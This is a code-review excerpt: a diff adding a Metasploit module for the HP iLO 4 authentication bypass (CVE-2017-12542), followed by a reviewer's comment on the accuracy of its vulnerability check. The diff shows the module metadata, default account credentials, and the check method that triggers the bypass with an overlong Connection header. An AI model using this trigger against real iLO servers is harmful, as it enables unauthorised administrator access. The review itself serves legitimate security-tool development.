modules/auxiliary/admin/hp/hp_ilo_create_admin_account.rb

```diff
@@ -0,0 +1,109 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'HP iLO 4 1.00-2.50 Authentication Bypass Administrator Account Creation',
+      'Description'    => %q{
+        This module exploits an authentication bypass in HP iLO 4 1.00 to 2.50, triggered by a buffer
+        overflow in the Connection HTTP header handling by the web server.
+        Exploiting this vulnerability gives full access to the Rest API, allowing arbitrary
+        accounts creation.
+      },
+      'References'     =>
+        [
+          [ 'CVE', '2017-12542' ],
+          [ 'BID', '100467' ],
+          [ 'URL', 'https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03769en_us' ],
+          [ 'URL', 'https://www.synacktiv.com/posts/exploit/hp-ilo-talk-at-recon-brx-2018.html' ]
+        ],
+      'Author'         =>
+        [
+          'Fabien Perigaud <fabien[dot]perigaud[at]synacktiv[dot]com>'
+        ],
+      'License'        => MSF_LICENSE,
+      'DisclosureDate' => "Aug 24 2017",
+      'DefaultOptions' => { 'SSL' => true }
+    ))
+
+    register_options(
+      [
+        Opt::RPORT(443),
+        OptString.new('USERNAME', [true, 'Username for the new account', 'msf_user']),
+        OptString.new('PASSWORD', [true, 'Password for the new account', 'msf_p4ssw0rd'])
+      ])
+  end
+
+  def check
+    begin
+      res = send_request_cgi({
+                             'method' => 'GET',
+                             'uri'    => '/rest/v1/AccountService/Accounts',
+                             'headers' => {
+                               "Connection" => Rex::Text.rand_text_alphanumeric(29)
+                             }
+                             })
+    rescue
+      return Exploit::CheckCode::Safe
+    end
+
+    if res.code == 200
+      return Exploit::CheckCode::Vulnerable
+    end
```

Comment:
Have you tried this on the patched version?

A HTTP 200 OK response for `/rest/v1/AccountService/Accounts` would flag the host as vulnerable on any servers for which this path exists and which ignore unusual `Connection` headers.

Also, seeing as only the HTTP status code is used to confirm the vulnerability, a `CheckCode::Appears` or `CheckCode::Detected` would be more accurate than `CheckCode::Vulnerable`. The latter is typically reserved for when the vulnerability is confirmed via some form of exploitation, as per [How to write a check() method](https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-check()-method).